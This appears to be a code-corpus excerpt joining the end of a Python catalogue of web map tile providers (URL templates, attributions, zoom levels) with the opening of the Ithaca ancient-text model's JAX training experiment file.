format = 'png',
size = '256',
name = 'HERE.mapLabels'
),
trafficFlow = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'traffic',
variant = 'normal.day',
max_zoom = 20,
type = 'flowtile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.trafficFlow'
),
carnavDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'carnav.day.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.carnavDayGrey'
),
hybridDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDay'
),
hybridDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayMobile'
),
hybridDayTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayTransit'
),
hybridDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.grey.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayGrey'
),
pedestrianDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'pedestrian.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.pedestrianDay'
),
pedestrianNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'pedestrian.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.pedestrianNight'
),
satelliteDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'satellite.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.satelliteDay'
),
terrainDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'terrain.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.terrainDay'
),
terrainDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'terrain.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.terrainDayMobile'
)
),
FreeMapSK = TileProvider(
url = 'http://t{s}.freemap.sk/T/{z}/{x}/{y}.jpeg',
min_zoom = 8,
max_zoom = 16,
subdomains = '1234',
bounds = [[47.204642, 15.996093], [49.830896, 22.576904]],
attribution = '(C) OpenStreetMap contributors, vizualization CC-By-SA 2.0 Freemap.sk',
name = 'FreeMapSK'
),
MtbMap = TileProvider(
url = 'http://tile.mtbmap.cz/mtbmap_tiles/{z}/{x}/{y}.png',
attribution = '(C) OpenStreetMap contributors & USGS',
name = 'MtbMap'
),
CartoDB = Bunch(
Positron = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_all',
name = 'CartoDB.Positron'
),
PositronNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_nolabels',
name = 'CartoDB.PositronNoLabels'
),
PositronOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_only_labels',
name = 'CartoDB.PositronOnlyLabels'
),
DarkMatter = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_all',
name = 'CartoDB.DarkMatter'
),
DarkMatterNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_nolabels',
name = 'CartoDB.DarkMatterNoLabels'
),
DarkMatterOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_only_labels',
name = 'CartoDB.DarkMatterOnlyLabels'
),
Voyager = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager',
name = 'CartoDB.Voyager'
),
VoyagerNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_nolabels',
name = 'CartoDB.VoyagerNoLabels'
),
VoyagerOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_only_labels',
name = 'CartoDB.VoyagerOnlyLabels'
),
VoyagerLabelsUnder = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_labels_under',
name = 'CartoDB.VoyagerLabelsUnder'
)
),
HikeBike = Bunch(
HikeBike = TileProvider(
url = 'https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors',
variant = 'hikebike',
name = 'HikeBike.HikeBike'
),
HillShading = TileProvider(
url = 'https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png',
max_zoom = 15,
attribution = '(C) OpenStreetMap contributors',
variant = 'hillshading',
name = 'HikeBike.HillShading'
)
),
BasemapAT = Bunch(
basemap = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 20,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'geolandbasemap',
name = 'BasemapAT.basemap'
),
grau = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmapgrau',
name = 'BasemapAT.grau'
),
overlay = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmapoverlay',
name = 'BasemapAT.overlay'
),
highdpi = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'jpeg',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmaphidpi',
name = 'BasemapAT.highdpi'
),
orthofoto = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 20,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'jpeg',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmaporthofoto30cm',
name = 'BasemapAT.orthofoto'
)
),
nlmaps = Bunch(
standaard = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaart',
name = 'nlmaps.standaard'
),
pastel = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaartpastel',
name = 'nlmaps.pastel'
),
grijs = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaartgrijs',
name = 'nlmaps.grijs'
),
luchtfoto = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts/1.0.0/2016_ortho25/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
name = 'nlmaps.luchtfoto'
)
),
NASAGIBS = Bunch(
ModisTerraTrueColorCR = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 9,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_CorrectedReflectance_TrueColor',
name = 'NASAGIBS.ModisTerraTrueColorCR'
),
ModisTerraBands367CR = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 9,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_CorrectedReflectance_Bands367',
name = 'NASAGIBS.ModisTerraBands367CR'
),
ViirsEarthAtNight2012 = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 8,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'VIIRS_CityLights_2012',
name = 'NASAGIBS.ViirsEarthAtNight2012'
),
ModisTerraLSTDay = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 7,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Land_Surface_Temp_Day',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraLSTDay'
),
ModisTerraSnowCover = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 8,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Snow_Cover',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraSnowCover'
),
ModisTerraAOD = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 6,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Aerosol',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraAOD'
),
ModisTerraChlorophyll = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 7,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Chlorophyll_A',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraChlorophyll'
)
),
NLS = TileProvider(
url = 'https://nls-{s}.tileserver.com/nls/{z}/{x}/{y}.jpg',
attribution = 'National Library of Scotland Historic Maps',
bounds = [[49.6, -12], [61.7, 3]],
min_zoom = 1,
max_zoom = 18,
subdomains = '0123',
name = 'NLS'
),
JusticeMap = Bunch(
income = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'income',
name = 'JusticeMap.income'
),
americanIndian = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'indian',
name = 'JusticeMap.americanIndian'
),
asian = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'asian',
name = 'JusticeMap.asian'
),
black = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'black',
name = 'JusticeMap.black'
),
hispanic = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'hispanic',
name = 'JusticeMap.hispanic'
),
multi = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'multi',
name = 'JusticeMap.multi'
),
nonWhite = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'nonwhite',
name = 'JusticeMap.nonWhite'
),
white = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'white',
name = 'JusticeMap.white'
),
plurality = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'plural',
name = 'JusticeMap.plurality'
)
),
Wikimedia = TileProvider(
url = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png',
attribution = 'Wikimedia',
min_zoom = 1,
max_zoom = 19,
name = 'Wikimedia'
),
GeoportailFrance = Bunch(
parcels = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 20,
apikey = 'choisirgeoportail',
format = 'image/png',
style = 'bdparcellaire',
variant = 'CADASTRALPARCELS.PARCELS',
name = 'GeoportailFrance.parcels'
),
ignMaps = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 18,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'GEOGRAPHICALGRIDSYSTEMS.MAPS',
name = 'GeoportailFrance.ignMaps'
),
maps = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 18,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'GEOGRAPHICALGRIDSYSTEMS.MAPS.SCAN-EXPRESS.STANDARD',
name = 'GeoportailFrance.maps'
),
orthos = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 19,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'ORTHOIMAGERY.ORTHOPHOTOS',
name = 'GeoportailFrance.orthos'
)
),
OneMapSG = Bunch(
Default = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Default',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Default'
),
Night = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Night',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Night'
),
Original = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Original',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Original'
),
Grey = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Grey',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Grey'
),
LandLot = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'LandLot',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.LandLot'
)
)
)
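# Illustrative usage sketch (not part of the original provider data): each
# TileProvider above bundles a URL template with the values needed to fill it.
# Assuming the enclosing Bunch behaves like a nested dict and is bound to a
# name such as `providers` (an assumption — the binding is outside this excerpt),
# a concrete tile URL could be built as follows:
#   prov = providers['CartoDB']['Positron']
#   prov['url'].format(s='a', r='', z=3, x=4, y=2, variant=prov['variant'])
#   # -> 'https://a.basemaps.cartocdn.com/light_all/3/4/2.png'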
|
train/experiment.py | deepmind/ithaca | 389 | 12770290 | # Copyright 2021 the Ithaca Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ithaca: Restoring and attributing ancient texts with deep neural networks."""
import bz2
import distutils.dir_util  # copy_tree below needs the dir_util submodule imported explicitly
import functools
import glob
import os
import pickle
from absl import app
from absl import flags
from absl import logging
import dataloader
from ithaca.models.model import Model
from ithaca.util.alphabet import GreekAlphabet
from ithaca.util.loss import categorical_kl_divergence
from ithaca.util.loss import cross_entropy_label_smoothing_loss
from ithaca.util.loss import cross_entropy_loss
from ithaca.util.loss import cross_entropy_mask_loss
from ithaca.util.loss import date_loss_l1
from ithaca.util.optim import adaptive_grad_clip
from ithaca.util.optim import linear_warmup_and_sqrt_decay
from ithaca.util.optim import linear_weight
from ithaca.util.region_names import load_region_maps
import jax
import jax.numpy as jnp
from jaxline import experiment
from jaxline import platform
from jaxline import utils as jl_utils
import numpy as np
import optax
import tensorflow_datasets.public_api as tfds
FLAGS = flags.FLAGS
class Experiment(experiment.AbstractExperiment):
"""Ithaca experiment."""
# Holds a map from object properties that will be checkpointed to their name
  # within a checkpoint. Currently it is assumed that these are all sharded
# device arrays.
CHECKPOINT_ATTRS = {
'_params': 'params',
'_opt_state': 'opt_state',
}
def __init__(self, mode, init_rng, config):
"""Initializes experiment."""
super(Experiment, self).__init__(mode=mode)
self.mode = mode
self.init_rng = init_rng
self.config = config
# Same random key on each device.
self._rng_key = jl_utils.bcast_local_devices(self.init_rng)
# Checkpointed experiment state.
self._params = None
self._opt_state = None
# Input pipelines.
self._train_input = None
self._eval_input = None
# Forward and update functions.
self.forward = Model(**self.config.model)
self._update_func = jax.pmap(
self._update_func, axis_name='i', donate_argnums=(0, 1))
self._learning_rate_fn = functools.partial(
linear_warmup_and_sqrt_decay,
max_lr=self.config.optimizer.kwargs.learning_rate,
warmup_steps=self.config.optimizer.warmup)
self._opt_init, self._opt_update = self.optimizer()
if 'use_jit' in self.config.evaluation and self.config.evaluation.use_jit:
self._eval_batch = jax.jit(self._eval_batch)
# Create alphabet
alphabet_kwargs = dict(self.config.alphabet)
wordlist_path = alphabet_kwargs.pop('wordlist_path')
with open(wordlist_path, 'r') as f:
self._alphabet = GreekAlphabet(wordlist_file=f, **alphabet_kwargs)
# Create region mapping
self._region_map = {'main': None, 'sub': None}
if self.config.dataset.region_main_path:
with open(self.config.dataset.region_main_path, 'r') as f:
self._region_map['main'] = load_region_maps(f)
if self.config.dataset.region_sub_path:
with open(self.config.dataset.region_sub_path, 'r') as f:
self._region_map['sub'] = load_region_maps(f)
def optimizer(self):
config_opt = self.config.optimizer
kwargs = config_opt.kwargs.to_dict()
kwargs['learning_rate'] = self._learning_rate_fn
opt = getattr(optax, config_opt.name)(**kwargs)
if hasattr(config_opt, 'clip_adaptive') and config_opt.clip_adaptive:
if config_opt.clip_level > 0.:
opt = optax.chain(adaptive_grad_clip(config_opt.clip_level), opt)
elif config_opt.clip_level > 0.:
opt = optax.chain(optax.clip_by_global_norm(config_opt.clip_level), opt)
return opt
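  # Note on the schedule (a sketch under assumptions, not the imported
  # implementation): a "linear warmup and sqrt decay" schedule typically follows
  #   lr(step) = max_lr * min(step / warmup_steps, sqrt(warmup_steps / step))
  # i.e. it ramps up linearly for `warmup` steps and then decays as 1/sqrt(step).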
# _ _
# | |_ _ __ __ _(_)_ __
# | __| '__/ _` | | '_ \
# | |_| | | (_| | | | | |
# \__|_| \__,_|_|_| |_|
#
def step(self, global_step, rng, **unused_args):
"""See base class."""
if self._train_input is None:
self._initialize_train(rng)
batch = next(self._train_input)
(self._params, self._opt_state, scalars) = (
self._update_func(self._params, self._opt_state, global_step, batch,
rng))
scalars = jl_utils.get_first(scalars)
return scalars
def _initialize_train(self, rng):
# Check we haven't already restored params
if self._params is None:
logging.info(
'Initializing parameters rather than restoring from checkpoint.')
batch = next(self._build_train_input())
rng = jl_utils.get_first(rng)
params_rng, dropout_rng = jax.random.split(rng)
params_rng = jl_utils.bcast_local_devices(params_rng)
dropout_rng = jl_utils.bcast_local_devices(dropout_rng)
init_net = jax.pmap(
functools.partial(self.forward.init, is_training=True))
self._params = init_net({
'params': params_rng,
'dropout': dropout_rng
},
text_char=batch['text_char'],
text_word=batch['text_word'])
init_opt = jax.pmap(self._opt_init)
self._opt_state = init_opt(self._params)
self._train_input = jl_utils.py_prefetch(self._build_train_input)
self._train_input = jl_utils.double_buffer_on_gpu(self._train_input)
def _build_train_input(self):
"""See base class."""
num_devices = jax.device_count()
